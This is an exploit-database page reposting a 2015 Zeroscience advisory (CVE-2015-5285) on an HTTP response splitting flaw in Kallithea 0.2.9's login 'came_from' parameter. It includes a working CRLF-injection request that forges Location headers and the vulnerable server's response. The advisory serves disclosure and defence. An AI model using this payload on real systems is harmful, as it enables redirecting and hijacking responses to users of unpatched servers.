0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kallithea 0.2.9 HTTP Response Splitting Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability Vendor: Kallithea Product web page: https://www.kallithea-scm.org Version affected: 0.2.9 and 0.2.2 Summary: Kallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins. Desc: Kallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. Tested on: Kali Python Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5267 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php Vendor: https://kallithea-scm.org/news/release-0.3.html Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html CVE ID: 2015-5285 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285 21.09.2015 -- GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1 Host: 192.168.0.28:8080 Content-Length: 0 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.0.28:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438 ### HTTP/1.1 302 Found Cache-Control: no-cache Content-Length: 411 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 Sep 2015 13:58:05 GMT Location: http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk Pragma: no-cache Server: waitress <html> <head> <title>302 Found</title> </head> <body> <h1>302 Found</h1> The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk</a>; you should be redirected automatically. </body> </html> # 0day.today [2024-09-28] #